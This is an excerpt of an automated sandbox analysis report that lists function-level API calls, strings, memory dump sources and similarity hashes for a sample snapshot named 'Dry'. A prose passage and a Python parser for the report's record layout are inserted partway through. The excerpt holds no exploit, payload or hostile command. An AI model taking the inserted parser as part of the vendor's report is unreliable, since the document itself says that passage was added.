• Opcode Fuzzy Hash: 45eb8ce17c9c6b41a69535b8244107d1f189d173f392348e68749e297990b49c
• Instruction Fuzzy Hash: F4117C75910658FFDB218F65EC80DEE77B8EF01764F104419F805E7210E6319E4197A0
Strings
• Variable must be of type 'Object'., xrefs: 00B348C6
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID:
• String ID: Variable must be of type 'Object'.
• API String ID: 0-109567571
• Opcode ID: 3e4d3030937d1bef2234f2eab299eca6500354d8facec9bb9e4f8534b8f23d3d
• Instruction ID: df6d78dcdfb09045eccab2983e3543dca7d8b940e4d9a396da2d1ab6fa2d02e0
• Opcode Fuzzy Hash: 3e4d3030937d1bef2234f2eab299eca6500354d8facec9bb9e4f8534b8f23d3d
• Instruction Fuzzy Hash: 70C27871A00249DFCB24DF99C880BAEB7F1FF19710F2481A9E945AB392D775AD41CB90
APIs
• __Init_thread_footer.LIBCMT ref: 00AF15F2
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Init_thread_footer
• String ID:
• API String ID: 1385522511-0
• Opcode ID: 22a59d716aeac685d11459b95b6e450c8cf9d08755316b37d9bff920a6283958
• Instruction ID: 4e0f6fd4f6cab9c0e0c76519a68ece7ddf1f9c7bfe90b8265fc20fbf42f18a42
• Opcode Fuzzy Hash: 22a59d716aeac685d11459b95b6e450c8cf9d08755316b37d9bff920a6283958
• Instruction Fuzzy Hash: 3DB25674A08345CFCB24DF58C480A3AB7F1BB99700F64899DFA859B392D771E941CB92
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 00B009D8
  • Part of subcall function 00B03614: RaiseException.KERNEL32(?,?,?,00B009FA,?,00000000,?,?,?,?,?,?,00B009FA,00000000,00BA9758,00000000), ref: 00B03674
• __CxxThrowException@8.LIBVCRUNTIME ref: 00B009F5
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Exception@8Throw$ExceptionRaise
• String ID: Unknown exception
• API String ID: 3476068407-410509341
• Opcode ID: 379a3685636a22b0f041ac6d3811c8279859f72ba76082bdf9d19c1b334c4d38
• Instruction ID: 6eb332cb0e99ce0c09d5a3f5b9b33e4e36ca95561070d304e5005b769827c61b
• Opcode Fuzzy Hash: 379a3685636a22b0f041ac6d3811c8279859f72ba76082bdf9d19c1b334c4d38
• Instruction Fuzzy Hash: C7F0F63492420DB7CB00BAA8EC46E9E7FEC9E01750F6041F1B924A65F2FB71EA15C6D0
APIs
• GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00B68D52
• TerminateProcess.KERNEL32(00000000), ref: 00B68D59
• FreeLibrary.KERNEL32(?,?,?,?), ref: 00B68F3A
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Process$CurrentFreeLibraryTerminate
• String ID:
• API String ID: 146820519-0
• Opcode ID: 423db76ae9ffe8e13b28b8d84bd8627c3c28be569ad37d79a3519006fddbdc02
• Instruction ID: 780ad9c409e7322428f2636eaf9f4ac110b0b2aa5c6a5a5ca67afd1c906fabdc
• Opcode Fuzzy Hash: 423db76ae9ffe8e13b28b8d84bd8627c3c28be569ad37d79a3519006fddbdc02
• Instruction Fuzzy Hash: AF125A71A083419FC714DF28C484B2ABBE5FF88314F14899DE8899B292DB75ED45CB92
APIs
  • Part of subcall function 00AE327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AE32AF
  • Part of subcall function 00AE327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 00AE32B7
  • Part of subcall function 00AE327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AE32C2
  • Part of subcall function 00AE327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AE32CD
  • Part of subcall function 00AE327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 00AE32D5
  • Part of subcall function 00AE327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 00AE32DD
  • Part of subcall function 00AE3205: RegisterWindowMessageW.USER32(00000004,?,00AE2964), ref: 00AE325D
• GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00AE2A0A
• OleInitialize.OLE32 ref: 00AE2A28
• CloseHandle.KERNEL32(00000000,00000000), ref: 00B23A0D
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
• String ID:
• API String ID: 1986988660-0
• Opcode ID: fc61272c8a3a5640e2ba9e8dcc8d292c6ab87b62c177dd2bd23f5c9582fa2920
• Instruction ID: 6ba4fc60cf979fe23ae0a043933271d281e7a85c5b8200b9ddb421c26ca53f18
• Opcode Fuzzy Hash: fc61272c8a3a5640e2ba9e8dcc8d292c6ab87b62c177dd2bd23f5c9582fa2920
• Instruction Fuzzy Hash: 66719BB19112408FD7A8EF7AAE696663BE0BB68344340876AE519C7371EFF09441CF64
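The function records above share one layout: an APIs list (with nested "Part of subcall function" entries), an optional Strings list, the Memory Dump Source the function was lifted from, the IDA plugin snapshot, and a Similarity block of IDs and fuzzy hashes. The Python below is an added example, not part of the Joe Sandbox report or of Joe Sandbox's own tooling: it parses records in that layout into structured objects so the Opcode IDs, API String IDs and call lists can be indexed or compared across reports. Every format detail is taken from the records on this page and nothing more is assumed: the API String ID is read as two numeric halves because the report prints 0 for a half whose list is empty (146820519-0 where String ID is blank), and the OleInitialize.OLE32 entry shows that a call can appear without an argument list. SAMPLE is two of the records above, abridged, with the "Download File" link residue removed.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "<name>.<MODULE>(<args>), ref: <addr>"; the argument list and its comma are
# absent for calls such as "OleInitialize.OLE32 ref: 00AE2A28".
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?"
    r"(?P<name>[\w@]+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})$")

@dataclass
class ApiCall:
    name: str                  # e.g. TerminateProcess
    module: str                # e.g. KERNEL32
    args: list                 # argument column as printed; '?' means unresolved
    ref: str                   # call-site address
    subcall_of: Optional[str]  # callee address when marked "Part of subcall function"

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)     # ApiCall objects, in report order
    strings: list = field(default_factory=list)  # bullets under "Strings"
    meta: dict = field(default_factory=dict)     # every other "Key: value" bullet

    @property
    def api_string_id(self) -> tuple:
        # "3476068407-410509341" = API half, string half; the report prints 0 for
        # a half whose list is empty ("146820519-0" where String ID is blank).
        a, _, s = self.meta.get("API String ID", "0-0").partition("-")
        return int(a), int(s)

def parse_record(text: str) -> FunctionRecord:
    rec, section = FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTION_HEADERS:
            section = line
        elif line.startswith("•"):
            body = line[1:].strip()
            if section == "APIs":
                m = API_RE.match(body)
                if not m:
                    raise ValueError(f"unrecognised API line: {body!r}")
                args = m.group("args")
                rec.apis.append(ApiCall(m.group("name"), m.group("mod"),
                                        args.split(",") if args else [],
                                        m.group("ref"), m.group("sub")))
            elif section == "Strings":
                rec.strings.append(body)
            else:
                key, _, value = body.partition(":")
                rec.meta[key.strip()] = value.strip()
    return rec

def parse_records(text: str) -> list:
    """Split an excerpt into records; each ends with its Instruction Fuzzy Hash line."""
    records, buf = [], []
    for line in text.splitlines():
        buf.append(line)
        if line.strip().lstrip("•").strip().startswith("Instruction Fuzzy Hash:"):
            records.append(parse_record("\n".join(buf)))
            buf = []
    return records

def direct_calls(rec: FunctionRecord) -> list:
    """API names the function calls itself (subcall entries excluded), in order."""
    return [c.name for c in rec.apis if c.subcall_of is None]

# Constructed input: two records copied (abridged) from the report excerpt above.
SAMPLE = """\
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 00B009D8
  • Part of subcall function 00B03614: RaiseException.KERNEL32(?,?,?,00B009FA,?,00000000,?,?,?,?,?,?,00B009FA,00000000,00BA9758,00000000), ref: 00B03674
• __CxxThrowException@8.LIBVCRUNTIME ref: 00B009F5
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: Exception@8Throw$ExceptionRaise
• String ID: Unknown exception
• API String ID: 3476068407-410509341
• Instruction Fuzzy Hash: C7F0F63492420DB7CB00BAA8EC46E9E7FEC9E01750F6041F1B924A65F2FB71EA15C6D0
APIs
• GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00B68D52
• TerminateProcess.KERNEL32(00000000), ref: 00B68D59
• FreeLibrary.KERNEL32(?,?,?,?), ref: 00B68F3A
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
Similarity
• API ID: Process$CurrentFreeLibraryTerminate
• String ID:
• API String ID: 146820519-0
• Opcode ID: 423db76ae9ffe8e13b28b8d84bd8627c3c28be569ad37d79a3519006fddbdc02
• Instruction Fuzzy Hash: AF125A71A083419FC714DF28C484B2ABBE5FF88314F14899DE8899B292DB75ED45CB92
"""
```

parse_records(SAMPLE) returns two FunctionRecord objects; grouping records by api_string_id or by meta["Opcode ID"] is the pivot to use when comparing this sample's disassembly against another report's. The fuzzy hashes are kept as opaque strings on purpose: the report does not describe how Joe Sandbox compares them, so the example does not guess.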
APIs
  • Part of subcall function 00AE61A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00AE6299
• KillTimer.USER32(?,00000001,?,?), ref: 00AFFD36
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00AFFD45
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B3FE33
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
• Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
Similarity
• API ID: IconNotifyShell_Timer$Kill
• String ID:
• API String ID: 3500052701-0
• Opcode ID: 65777d86cb6b73457a604008a45d44b2c7377bd358c9ba304a30821f4f417254
• Instruction ID: e6d91a879a60edad537ff366a35260f4a3d44e83728e3d464fd4d87d60874119
• Opcode Fuzzy Hash: 65777d86cb6b73457a604008a45d44b2c7377bd358c9ba304a30821f4f417254
• Instruction Fuzzy Hash: 3C316471904354AFEB328F24C895BE6BBEC9F16308F1004AEE69A97242D7745A85CB51
APIs
• CloseHandle.KERNEL32(00000000,00000000,?,?,00B1894C,?,00BA9CE8,0000000C), ref: 00B18A84
• GetLastError.KERNEL32(?,00B1894C,?,00BA9CE8,0000000C), ref: 00B18A8E
• __dosmaperr.LIBCMT ref: 00B18AB9
Similarity
• API ID: CloseErrorHandleLast__dosmaperr
• String ID:
• API String ID: 2583163307-0
• Opcode ID: 650b005a190e69720a4cbff757b0483bf7df7357a78e59300471b2a85f5bc98c
• Instruction ID: 4f1b3bd7f5798b269e883b755b4ce8d1c9044f289224a178111a7bedf1c798f3
• Opcode Fuzzy Hash: 650b005a190e69720a4cbff757b0483bf7df7357a78e59300471b2a85f5bc98c
• Instruction Fuzzy Hash: DC0104326251609BC6346234A886BFE67C9EFC2734FA902DAF8189B1D2DF718DC18590
APIs
• SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00B197BA,FF8BC369,00000000,00000002,00000000), ref: 00B19744
• GetLastError.KERNEL32(?,00B197BA,FF8BC369,00000000,00000002,00000000,?,00B15ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00B06F41), ref: 00B1974E
• __dosmaperr.LIBCMT ref: 00B19755
Similarity
• API ID: ErrorFileLastPointer__dosmaperr
• String ID:
• API String ID: 2336955059-0
• Opcode ID: 2d38f9229cd122c58ea2c59063dc31b3cc7443fff662d2f439ec6041a0d39505
• Instruction ID: abffe48ef62ae83222fa5a88afb0428954680ef2503d36a66e4b0599432e87a6
• Opcode Fuzzy Hash: 2d38f9229cd122c58ea2c59063dc31b3cc7443fff662d2f439ec6041a0d39505
• Instruction Fuzzy Hash: 30019C33720104ABCB119F99DC05CEE3BA9EF81330B640288F8109B1D0EB31DE81CB90
APIs
• TranslateMessage.USER32(?), ref: 00AEF27B
• DispatchMessageW.USER32(?), ref: 00AEF289
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AEF29F
• Sleep.KERNEL32(0000000A), ref: 00AEF2B1
• TranslateAcceleratorW.USER32(?,?,?), ref: 00B332D8
Similarity
• API ID: Message$Translate$AcceleratorDispatchPeekSleep
• String ID:
• API String ID: 3288985973-0
• Opcode ID: 3d1c3761cd8e1492435a5fc231dfbb7a0de49a8bb0deb70b51f7e58ef0cb1fb4
• Instruction ID: 4f6e676d12f109756abed6a03cf60415ec4a5c34631801eba278053b5b6689b0
• Opcode Fuzzy Hash: 3d1c3761cd8e1492435a5fc231dfbb7a0de49a8bb0deb70b51f7e58ef0cb1fb4
• Instruction Fuzzy Hash: 40F0DA316043849BE774DBA1DC89FEA73A8EF84751F104929E25A97090DB7495888B25
APIs
• __Init_thread_footer.LIBCMT ref: 00AF3006
Strings
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                    • String ID: CALL
                                                                                                                                                                                                                                                                                    • API String ID: 1385522511-4196123274
                                                                                                                                                                                                                                                                                    • Opcode ID: 2c8dd75e806d83e227ba47dfe08a2e256617d635ba83fb76717d89d7822f005e
                                                                                                                                                                                                                                                                                    • Instruction ID: d39515b981b94bde38f44be81bee4163fa34ba9df69423b99f836d91c9f040be
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c8dd75e806d83e227ba47dfe08a2e256617d635ba83fb76717d89d7822f005e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C9229CB06082059FC724DF54C884B2ABBF1FF88314F24899DF6968B3A1DB71E941CB52

Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 06311a85d943b8e81ad4f14d8d15f551d541a959b2f5427142077bb3db06ffac
• Instruction ID: 0a91e654767ddcc955c3b1abcc8a6a523d85693486e24852d1169ba3709fbc14
• Opcode Fuzzy Hash: 06311a85d943b8e81ad4f14d8d15f551d541a959b2f5427142077bb3db06ffac
• Instruction Fuzzy Hash: 0A329C30A00219EFCB20EF94D891BBEB7F4EF14354F248598F955AB2A1E771AD44CB91

APIs
• GetOpenFileNameW.COMDLG32(?), ref: 00B2413B
  • Part of subcall function 00AE5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AE55D1,?,?,00B24B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00AE5871
  • Part of subcall function 00AE3A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00AE3A76
Strings
Similarity
• API ID: Name$Path$FileFullLongOpen
• String ID: X
• API String ID: 779396738-3081909835
• Opcode ID: 215c08cbcdefc413430a1b0bd37193710245400136f0940eaeaead4cc6f28340
• Instruction ID: f596e60426ba5bac6f270ec65e5b490adb7c028ecb85de6a171191935cbce471
• Opcode Fuzzy Hash: 215c08cbcdefc413430a1b0bd37193710245400136f0940eaeaead4cc6f28340
• Instruction Fuzzy Hash: AB218171A042989BDB01DFA5DC09BEE7BF8AF49304F008059E549A7241DFB59A898F61

APIs
• Shell_NotifyIconW.SHELL32(00000000,?), ref: 00AE3A3C
Similarity
• API ID: IconNotifyShell_
• String ID:
• API String ID: 1144537725-0
• Opcode ID: 3060519891c0da1f51524201437cd4fbf96ecd2dbe1c13dbcb9ef4ad6eedc1bd
• Instruction ID: fa1ca6b0c164fbc8d3a6e62cf031bc3b51e338c15d596d2c5f687138eaed29f7
• Opcode Fuzzy Hash: 3060519891c0da1f51524201437cd4fbf96ecd2dbe1c13dbcb9ef4ad6eedc1bd
• Instruction Fuzzy Hash: C231A5715043019FD721DF25D888797BBF8FB48348F000A2EE6D997241E7B5A988CB52

APIs
• IsThemeActive.UXTHEME ref: 00AE333D
  • Part of subcall function 00AE32E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00AE32FB
  • Part of subcall function 00AE32E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00AE3312
  • Part of subcall function 00AE338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00AE3368,?), ref: 00AE33BB
  • Part of subcall function 00AE338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00AE3368,?), ref: 00AE33CE
  • Part of subcall function 00AE338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00BB2418,00BB2400,?,?,?,?,?,?,00AE3368,?), ref: 00AE343A
  • Part of subcall function 00AE338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00BB2418,?,?,?,?,?,?,?,00AE3368,?), ref: 00AE34BB
• SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00AE3377
Similarity
• API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
• String ID:
• API String ID: 1550534281-0
• Opcode ID: 36ac63c685a28f0ce7773dc87515554be1a728fbe148a09415aff33afbf77065
• Instruction ID: 9575a4aad19fc1c91db1f0c3017bb4c86430dc332e975134e57d028e4145a058
• Opcode Fuzzy Hash: 36ac63c685a28f0ce7773dc87515554be1a728fbe148a09415aff33afbf77065
• Instruction Fuzzy Hash: 74F05E325543849FE711AF61ED0FB253BE4AB00719F044A19B6098B1E2CFFA95908B48

APIs
• __Init_thread_footer.LIBCMT ref: 00AECEEE
Memory Dump Source
• Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                                    • Opcode ID: d4395b45ffe20d7e31f530444f71f70df11e709736a03f2cdbd049555ee53ac3
                                                                                                                                                                                                                                                                                    • Instruction ID: c1bc1b3ce707ef209d1e667756fd1f08d0be11cb3f84fe35cef2d4da7b8bf0c0
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d4395b45ffe20d7e31f530444f71f70df11e709736a03f2cdbd049555ee53ac3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D32F375A00249DFCB20CF59C885ABEB7F9FF44360F288499E916AB251C775ED42CB90
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: LoadString
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2948472770-0
                                                                                                                                                                                                                                                                                    • Opcode ID: b8b13838ea9611bb4f5a224b0436d608fb6302d4c4391c104507fb6ab98bf440
                                                                                                                                                                                                                                                                                    • Instruction ID: 27eeedc0876ecefb762fc2ba4dcb9c35206c9ea1d1087af0ce5c864cc937704b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b8b13838ea9611bb4f5a224b0436d608fb6302d4c4391c104507fb6ab98bf440
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06D17B74A04209EFCB14EF98C8919AEBBF5FF48314F244199E915AB391DB35AD81CF90
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: 7cfe861eac18ef02fd89f7fc881a441b86d48a48991da2bbb69249a0927c6fa3
                                                                                                                                                                                                                                                                                    • Instruction ID: 11ea1f956a986d118e4b0df68ddc742002a88b8a8187ace9d9633225b2f15cf0
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7cfe861eac18ef02fd89f7fc881a441b86d48a48991da2bbb69249a0927c6fa3
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB51A375B04209AFDB20DF68C841AB97FE1EB85364F1981E8F8189B7D1D771AD42CB90
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 00B4FCCE
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.2457583835.0000000000AE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457555521.0000000000AE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000B7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457656893.0000000000BA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457768761.0000000000BAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 0000000A.00000002.2457799916.0000000000BB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_ae0000_Dry.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: BuffCharLower
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2358735015-0
                                                                                                                                                                                                                                                                                    • Opcode ID: a635c8388d60e05b5885b02e3485d5b8ff3aa595cf47a8774342f5636e7cd9ab
                                                                                                                                                                                                                                                                                    • Instruction ID: 9719b0de65cbad227100cf30e7bad3a402331d900216ab436096c9414401e5ee
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a635c8388d60e05b5885b02e3485d5b8ff3aa595cf47a8774342f5636e7cd9ab
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E41A77690020AAFCB11EF68C8819BEB7F9EF44314B20457EE51697251EB70DF45DB60
                                                                                                                                                                                                                                                                                    APIs
